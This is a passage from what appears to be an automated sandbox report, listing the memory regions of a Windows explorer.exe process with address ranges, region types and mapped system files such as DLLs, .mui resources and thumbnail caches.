0x4460000 end_va = 0x4470fff entry_point = 0x4460000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 3716 start_va = 0x4480000 end_va = 0x44fffff entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 3717 start_va = 0x4500000 end_va = 0x457ffff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 3718 start_va = 0x4580000 end_va = 0x4580fff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 3719 start_va = 0x4590000 end_va = 0x460ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 3720 start_va = 0x4690000 end_va = 0x470ffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 3721 start_va = 0x4710000 end_va = 0x4c01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004710000" filename = "" Region: id = 3722 start_va = 0x4c10000 end_va = 0x4c10fff entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 3723 start_va = 0x4c20000 end_va = 0x4d1ffff entry_point = 0x4c20000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3724 start_va = 0x4da0000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 3725 start_va = 0x5020000 end_va = 0x509ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 3726 start_va = 0x50a0000 end_va = 0x511ffff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 3727 start_va = 0x5120000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 3728 start_va = 0x5220000 end_va = 0x5222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005220000" filename = "" Region: id = 3729 start_va = 0x5230000 end_va = 0x5232fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005230000" filename = "" Region: id = 3730 start_va = 0x5240000 end_va = 0x5240fff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 3731 start_va = 0x5250000 end_va = 0x5250fff entry_point = 0x0 region_type = private name = "private_0x0000000005250000" filename = "" Region: id = 3732 start_va = 0x5260000 end_va = 0x5268fff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 3733 start_va = 0x5270000 end_va = 0x5273fff entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3734 start_va = 0x5280000 end_va = 0x5280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005280000" filename = "" Region: id = 3735 start_va = 0x52a0000 end_va = 0x52a8fff entry_point = 0x0 region_type = private name = "private_0x00000000052a0000" filename = "" Region: id = 3736 start_va = 0x52b0000 end_va = 0x52b0fff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 3737 start_va = 0x52c0000 end_va = 0x53bffff entry_point = 0x52c0000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3738 start_va = 0x53c0000 end_va = 0x53c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000053c0000" filename = "" Region: id = 3739 start_va = 0x5420000 end_va = 0x5467fff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 3740 start_va = 0x5470000 end_va = 0x5470fff entry_point = 0x5470000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 3741 start_va = 0x5480000 end_va = 0x54b1fff entry_point = 0x5480000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 3742 start_va = 0x54c0000 end_va = 0x553ffff entry_point = 0x0 region_type = private name = "private_0x00000000054c0000" filename = "" Region: id = 3743 start_va = 0x5540000 end_va = 0x5d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 3744 start_va = 0x5d40000 end_va = 0x5d4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d40000" filename = "" Region: id = 3745 start_va = 0x5d50000 end_va = 0x5d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 3746 start_va = 0x5d60000 end_va = 0x5d6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d60000" filename = "" Region: id = 3747 start_va = 0x5d70000 end_va = 0x5d81fff entry_point = 0x5d70000 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 3748 start_va = 0x5d90000 end_va = 0x5d91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d90000" filename = "" Region: id = 3749 start_va = 0x5da0000 end_va = 0x5da1fff entry_point = 0x5da0000 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 3750 start_va = 0x5db0000 end_va = 0x5db7fff entry_point = 0x5db0000 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 3751 start_va = 0x5dd0000 end_va = 0x5debfff entry_point = 0x5dd0000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000035.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000035.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000035.db") Region: id = 3752 start_va = 0x5df0000 end_va = 0x5df2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005df0000" filename = "" Region: id = 3753 start_va = 0x5e00000 end_va = 0x5e00fff entry_point = 0x5e00000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3754 start_va = 0x5e10000 end_va = 0x5e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e10000" filename = "" Region: id = 3755 start_va = 0x5e50000 end_va = 0x5e51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e50000" filename = "" Region: id = 3756 start_va = 0x5e60000 end_va = 0x5ea7fff entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 3757 start_va = 0x5f30000 end_va = 0x67b2fff entry_point = 0x5f30000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 3758 start_va = 0x67c0000 end_va = 0x683ffff entry_point = 0x0 region_type = private name = "private_0x00000000067c0000" filename = "" Region: id = 3759 start_va = 0x6840000 end_va = 0x6888fff entry_point = 0x0 region_type = private name = "private_0x0000000006840000" filename = "" Region: id = 3760 start_va = 0x6890000 end_va = 0x8c11fff entry_point = 0x6890000 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 3761 start_va = 0x8c20000 end_va = 0x8c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000008c20000" filename = "" Region: id = 3762 start_va = 0x8ca0000 end_va = 0x8d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000008ca0000" filename = "" Region: id = 3763 start_va = 0x8d20000 end_va = 0x8d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000008d20000" filename = "" Region: id = 3764 start_va = 0x8db0000 end_va = 0x8dbafff entry_point = 0x8db0000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 3765 start_va = 0x8dc0000 end_va = 0x8ebffff entry_point = 0x8dc0000 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3766 start_va = 0x8f20000 end_va = 0x8f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000008f20000" filename = "" Region: id = 3767 start_va = 0x9020000 end_va = 0x9020fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009020000" filename = "" Region: id = 3768 start_va = 0x9030000 end_va = 0x9030fff entry_point = 0x0 region_type = private name = "private_0x0000000009030000" filename = "" Region: id = 3769 start_va = 0x9040000 end_va = 0x9040fff entry_point = 0x0 region_type = private name = "private_0x0000000009040000" filename = "" Region: id = 3770 start_va = 0x9050000 end_va = 0x90cffff entry_point = 0x0 region_type = private name = "private_0x0000000009050000" filename = "" Region: id = 3771 start_va = 0x9150000 end_va = 0x91cffff entry_point = 0x0 region_type = private name = "private_0x0000000009150000" filename = "" Region: id = 3772 start_va = 0x91d0000 end_va = 0x92cffff entry_point = 0x91d0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 3773 start_va = 0x92d0000 end_va = 0x934ffff entry_point = 0x0 region_type = private name = "private_0x00000000092d0000" filename = "" Region: id = 3774 start_va = 0x93d0000 end_va = 0x93d4fff entry_point = 0x93d0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3775 start_va = 0x93e0000 end_va = 0x93effff entry_point = 0x93e0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3776 start_va = 0x93f0000 end_va = 0x93f2fff entry_point = 0x93f0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 3777 start_va = 0x9400000 end_va = 0x9401fff entry_point = 0x9400000 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 3778 start_va = 0x9410000 end_va = 0x9412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009410000" filename = "" Region: id = 3779 start_va = 0x94a0000 end_va = 0x951ffff entry_point = 0x0 region_type = private name = "private_0x00000000094a0000" filename = "" Region: id = 3780 start_va = 0x9520000 end_va = 0x961ffff entry_point = 0x9520000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3781 start_va = 0x96e0000 end_va = 0x96effff entry_point = 0x0 region_type = private name = "private_0x00000000096e0000" filename = "" Region: id = 3782 start_va = 0x9700000 end_va = 0x98fffff entry_point = 0x0 region_type = private name = "private_0x0000000009700000" filename = "" Region: id = 3783 start_va = 0x9900000 end_va = 0x99fffff entry_point = 0x9900000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 3784 start_va = 0x9a00000 end_va = 0x9afffff entry_point = 0x9a00000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3785 start_va = 0x9b00000 end_va = 0x9bfffff entry_point = 0x9b00000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 3786 start_va = 0x9c20000 end_va = 0x9c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c20000" filename = "" Region: id = 3787 start_va = 0x9ca0000 end_va = 0x9d9ffff entry_point = 0x9ca0000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3788 start_va = 0x9da0000 end_va = 0x9e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000009da0000" filename = "" Region: id = 3789 start_va = 0x9e20000 end_va = 0x9e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000009e20000" filename = "" Region: id = 3790 start_va = 0x9ea0000 end_va = 0x9ea1fff entry_point = 0x9ea0000 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 3791 start_va = 0x9eb0000 end_va = 0x9eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000009eb0000" filename = "" Region: id = 3792 start_va = 0x9ec0000 end_va = 0x9ec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009ec0000" filename = "" Region: id = 3793 start_va = 0x9f50000 end_va = 0x9f51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009f50000" filename = "" Region: id = 3794 start_va = 0x9f60000 end_va = 0x9f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009f60000" filename = "" Region: id = 3795 start_va = 0xa000000 end_va = 0xa001fff entry_point = 0xa000000 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 3796 start_va = 0xa020000 end_va = 0xa021fff entry_point = 0xa020000 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 3797 start_va = 0xa030000 end_va = 0xa12ffff entry_point = 0xa030000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 3798 start_va = 0xa130000 end_va = 0xa1affff entry_point = 0x0 region_type = private name = "private_0x000000000a130000" filename = "" Region: id = 3799 start_va = 0xa1b0000 end_va = 0xa22ffff entry_point = 0x0 region_type = private name = "private_0x000000000a1b0000" filename = "" Region: id = 3800 start_va = 0xa230000 end_va = 0xa2affff entry_point = 0x0 region_type = private name = "private_0x000000000a230000" filename = "" Region: id = 3801 start_va = 0xa330000 end_va = 0xa3affff entry_point = 0x0 region_type = private name = "private_0x000000000a330000" filename = "" Region: id = 3802 start_va = 0xa3b0000 end_va = 0xa42ffff entry_point = 0x0 region_type = private name = "private_0x000000000a3b0000" filename = "" Region: id = 3803 start_va = 0xa430000 end_va = 0xa52ffff entry_point = 0x0 region_type = private name = "private_0x000000000a430000" filename = "" Region: id = 3804 start_va = 0xa530000 end_va = 0xa530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a530000" filename = "" Region: id = 3805 start_va = 0xa5c0000 end_va = 0xa63ffff entry_point = 0x0 region_type = private name = "private_0x000000000a5c0000" filename = "" Region: id = 3806 start_va = 0xa640000 end_va = 0xaa3ffff entry_point = 0x0 region_type = private name = "private_0x000000000a640000" filename = "" Region: id = 3807 start_va = 0xaa40000 end_va = 0xaa42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aa40000" filename = "" Region: id = 3808 start_va = 0xaa50000 end_va = 0xaa53fff entry_point = 0xaa50000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 3809 start_va = 0xaa60000 end_va = 0xaadffff entry_point = 0x0 region_type = private name = "private_0x000000000aa60000" filename = "" Region: id = 3810 start_va = 0xaae0000 end_va = 0xaae2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aae0000" filename = "" Region: id = 3811 start_va = 0xab70000 end_va = 0xab71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ab70000" filename = "" Region: id = 3812 start_va = 0xab80000 end_va = 0xab82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ab80000" filename = "" Region: id = 3813 start_va = 0xab90000 end_va = 0xab92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ab90000" filename = "" Region: id = 3814 start_va = 0xaba0000 end_va = 0xaba2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aba0000" filename = "" Region: id = 3815 start_va = 0xabb0000 end_va = 0xabb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000abb0000" filename = "" Region: id = 3816 start_va = 0xabe0000 end_va = 0xabe0fff entry_point = 0x0 region_type = private name = "private_0x000000000abe0000" filename = "" Region: id = 3817 start_va = 0xabf0000 end_va = 0xac04fff entry_point = 0x0 region_type = private name = "private_0x000000000abf0000" filename = "" Region: id = 3818 start_va = 0xac10000 end_va = 0xb101fff entry_point = 0x0 region_type = private name = "private_0x000000000ac10000" filename = "" Region: id = 3819 start_va = 0xbe40000 end_va = 0xbf75fff entry_point = 0xbe40000 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 3820 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3821 start_va = 0x7df5ffb60000 end_va = 0x7ff5ffb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb60000" filename = "" Region: id = 3822 start_va = 0x7ff7b9f14000 end_va = 0x7ff7b9f15fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f14000" filename = "" Region: id = 3823 start_va = 0x7ff7b9f20000 end_va = 0x7ff7b9f21fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f20000" filename = "" Region: id = 3824 start_va = 0x7ff7b9f22000 end_va = 0x7ff7b9f23fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f22000" filename = "" Region: id = 3825 start_va = 0x7ff7b9f26000 end_va = 0x7ff7b9f27fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f26000" filename = "" Region: id = 3826 start_va = 0x7ff7b9f28000 end_va = 0x7ff7b9f29fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f28000" filename = "" Region: id = 3827 start_va = 0x7ff7b9f2a000 end_va = 0x7ff7b9f2bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f2a000" filename = "" Region: id = 3828 start_va = 0x7ff7b9f2c000 end_va = 0x7ff7b9f2dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f2c000" filename = "" Region: id = 3829 start_va = 0x7ff7b9f2e000 end_va = 0x7ff7b9f2ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f2e000" filename = "" Region: id = 3830 start_va = 0x7ff7b9f34000 end_va = 0x7ff7b9f35fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f34000" filename = "" Region: id = 3831 start_va = 0x7ff7b9f36000 end_va = 0x7ff7b9f37fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f36000" filename = "" Region: id = 3832 start_va = 0x7ff7b9f38000 end_va = 0x7ff7b9f39fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f38000" filename = "" Region: id = 3833 start_va = 0x7ff7b9f3e000 end_va = 0x7ff7b9f3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f3e000" filename = "" Region: id = 3834 start_va = 0x7ff7b9f4e000 end_va = 0x7ff7b9f4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f4e000" filename = "" Region: id = 3835 start_va = 0x7ff7b9f54000 end_va = 0x7ff7b9f55fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f54000" filename = "" Region: id = 3836 start_va = 0x7ff7b9f58000 end_va = 0x7ff7b9f59fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f58000" filename = "" Region: id = 3837 start_va = 0x7ff7b9f5c000 end_va = 0x7ff7b9f5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f5c000" filename = "" Region: id = 3838 start_va = 0x7ff7b9f5e000 end_va = 0x7ff7b9f5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f5e000" filename = "" Region: id = 3839 start_va = 0x7ff7b9f60000 end_va = 0x7ff7b9f61fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f60000" filename = "" Region: id = 3840 start_va = 0x7ff7b9f70000 end_va = 0x7ff7b9f71fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f70000" filename = "" Region: id = 3841 start_va = 0x7ff7b9f72000 end_va = 0x7ff7b9f73fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f72000" filename = "" Region: id = 3842 start_va = 0x7ff7b9f74000 end_va = 0x7ff7b9f75fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f74000" filename = "" Region: id = 3843 start_va = 0x7ff7b9f76000 end_va = 0x7ff7b9f77fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f76000" filename = "" Region: id = 3844 start_va = 0x7ff7b9f7a000 end_va = 0x7ff7b9f7bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f7a000" filename = "" Region: id = 3845 start_va = 0x7ff7b9f7c000 end_va = 0x7ff7b9f7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f7c000" filename = "" Region: id = 3846 start_va = 0x7ff7b9f80000 end_va = 0x7ff7b9f81fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f80000" filename = "" Region: id = 3847 start_va = 0x7ff7b9f82000 end_va = 0x7ff7b9f83fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f82000" filename = "" Region: id = 3848 start_va = 0x7ff7b9f84000 end_va = 0x7ff7b9f85fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f84000" filename = "" Region: id = 3849 start_va = 0x7ff7b9f86000 end_va = 0x7ff7b9f87fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f86000" filename = "" Region: id = 3850 start_va = 0x7ff7b9f88000 end_va = 0x7ff7b9f89fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f88000" filename = "" Region: id = 3851 start_va = 0x7ff7b9f8a000 end_va = 0x7ff7b9f8bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b9f8a000" filename = "" Region: id = 3852 start_va = 0x7ff7b9f90000 end_va = 0x7ff7ba08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b9f90000" filename = "" Region: id = 3853 start_va = 0x7ff7ba090000 end_va = 0x7ff7ba0b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ba090000" filename = "" Region: id = 3854 start_va = 0x7ff7ba0b3000 end_va = 0x7ff7ba0b4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0b3000" filename = "" Region: id = 3855 start_va = 0x7ff7ba0b5000 end_va = 0x7ff7ba0b6fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0b5000" filename = "" Region: id = 3856 start_va = 0x7ff7ba0bb000 end_va = 0x7ff7ba0bcfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0bb000" filename = "" Region: id = 3857 start_va = 0x7ff7ba0bd000 end_va = 0x7ff7ba0bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0bd000" filename = "" Region: id = 3858 start_va = 0x7ff7ba0be000 end_va = 0x7ff7ba0bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7ba0be000" filename = "" Region: id = 3859 start_va = 0x7ff7bac20000 end_va = 0x7ff7bb06dfff entry_point = 0x7ff7bac20000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 3860 start_va = 0x7ffadf420000 end_va = 0x7ffadf46dfff entry_point = 0x7ffadf420000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3861 start_va = 0x7ffadf4c0000 end_va = 0x7ffadf5fffff entry_point = 0x7ffadf4c0000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 3862 start_va = 0x7ffadf600000 end_va = 0x7ffadf6e2fff entry_point = 0x7ffadf600000 region_type = mapped_file name = "dismapi.dll" filename = "\\Windows\\System32\\DismApi.dll" (normalized: "c:\\windows\\system32\\dismapi.dll") Region: id = 3863 start_va = 0x7ffadf6f0000 end_va = 0x7ffadf7e4fff entry_point = 0x7ffadf6f0000 region_type = mapped_file name = "reagent.dll" filename = "\\Windows\\System32\\ReAgent.dll" (normalized: "c:\\windows\\system32\\reagent.dll") Region: id = 3864 start_va = 0x7ffadf7f0000 end_va = 0x7ffadf910fff entry_point = 0x7ffadf7f0000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 3865 start_va = 0x7ffadff90000 end_va = 0x7ffadffa3fff entry_point = 0x7ffadff90000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 3866 start_va = 0x7ffadfff0000 end_va = 0x7ffae0024fff entry_point = 0x7ffadfff0000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 3867 start_va = 0x7ffae0030000 end_va = 0x7ffae00cdfff entry_point = 0x7ffae0030000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3868 start_va = 0x7ffae0130000 end_va = 0x7ffae0d28fff entry_point = 0x7ffae0130000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 3869 start_va = 0x7ffae0d30000 end_va = 0x7ffae1075fff entry_point = 0x7ffae0d30000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 3870 start_va = 0x7ffae1080000 end_va = 0x7ffae123efff entry_point = 0x7ffae1080000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 3871 start_va = 0x7ffae1240000 end_va = 0x7ffae1481fff entry_point = 0x7ffae1240000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 3872 start_va = 0x7ffae1490000 end_va = 0x7ffae1514fff entry_point = 0x7ffae1490000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id 